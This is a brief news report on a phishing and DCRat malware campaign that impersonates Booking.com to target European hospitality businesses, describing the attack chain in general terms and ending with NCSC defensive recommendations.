New Malware Campaign Targets Hospitality Sector

Cybersecurity researchers have identified a multi-stage malware campaign aimed at hospitality organisations during the busy holiday season. The operation, tracked as PHALT#BLYX by Securonix, uses advanced social engineering techniques such as fake CAPTCHA prompts and simulated Blue Screen of Death errors to trick victims into manually executing malicious code.

The attack begins with phishing emails impersonating Booking.com, claiming urgent reservation cancellations and highlighting inflated room charges—often exceeding €1,000—to create panic. Clicking the link redirects victims to a convincing clone of the Booking.com website, which initiates the attack chain. Unlike earlier versions that relied on HTML application files and mshta.exe, this iteration abuses MSBuild.exe, a legitimate Microsoft utility, to compile and execute a malicious project file. This “living-off-the-land” technique helps the malware evade traditional endpoint security.

Victims are instructed to copy a PowerShell command from the clipboard into the Windows Run dialog. This command downloads the malicious project file, which MSBuild then executes. The final payload is a heavily obfuscated variant of DCRat, a remote access Trojan sold on underground forums, enabling keylogging, process injection, and secondary malware deployment.

Indicators suggest Russian-speaking threat actors are behind the campaign, including Cyrillic debug strings and the use of DCRat. The phishing lures reference charges in Euros, pointing to a focus on European hospitality businesses. Attackers also implemented stealthy persistence methods, such as adding Windows Defender exclusions and using Internet Shortcut files for startup persistence.

The UK’s National Cyber Security Centre (NCSC) urges organisations to adopt a layered defence strategy. Employees should never paste commands prompted by websites and should be trained to recognise social engineering tactics. NCSC offers free resources such as its “Top Tips for Staff” e-learning programme to improve awareness. Organisations are advised to treat unexpected booking-related emails with caution and verify requests through official channels before clicking links. Monitoring for unusual use of trusted tools like MSBuild.exe and PowerShell is essential, alongside behavioural detection for living-off-the-land techniques. Strengthening phishing defences through multi-layered email security and filtering is also recommended. Finally, maintaining offline backups and following NCSC’s guidance on mitigating malware and ransomware attacks will help ensure resilience.